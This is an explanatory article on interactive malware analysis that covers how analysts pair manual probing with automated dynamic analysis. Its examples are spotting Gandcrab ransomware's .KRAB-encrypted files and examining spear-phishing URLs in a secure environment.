Malware analysis is the process of determining the origin, purpose, and functionality of malware samples, and is generally divided into static and dynamic analysis varieties. Interactive analysis is a manual form of dynamic analysis that allows security researchers and incident responders to interact with suspected malware samples or their environment in real-time, making changes or giving instructions and receiving immediate results.
Much in the same way that static and dynamic analysis are used to complement each other, interactive analysis is often paired with more automated dynamic analysis. Interactive analysis is often employed to fill gaps left by automated analysis, allowing human specialists to save time in an investigation or whenever human intervention is necessary to discover alternate execution scenarios that automation may miss.
Generally speaking, automated analysis is the preferred method for analyzing potential malware samples at scale. However, there are situations in which human intervention can be beneficial for a variety of reasons.
For instance, well-trained analysts can draw on their expertise to apply manual interactive analysis techniques when it may save time during the investigation of a particular malware sample. Specifically, a security analyst or incident responder with prior experience with a particular malware family may anticipate registry changes at designated paths or in designated files that may be encrypted with a predictable extension. This approach can be useful for dealing with suspected ransomware which tends to abandon any attempts at evasion once it begins encrypting files.
The infamous Gandcrab ransomware, for instance, encrypted files with a .KRAB extension. Where automated methods need to complete a full analysis before security experts are provided with result outputs, an expert analyst can manually identify these unusual files, and take immediate action as soon as they’re found.
In a second scenario, an interactive analysis may not just save time, but it may be required to fully probe a sample and determine its true intent. This can be true when investigating potentially malicious URLs used in targeted spear-phishing attacks commonly leveled against individual, high-level executives or other members of an organization with high-level access to information. Analysts can investigate these URLs within a secure environment, and potentially find that they lead to phishing pages that mimic the look of commonly-used websites where sensitive information is inputted, such as bank login pages.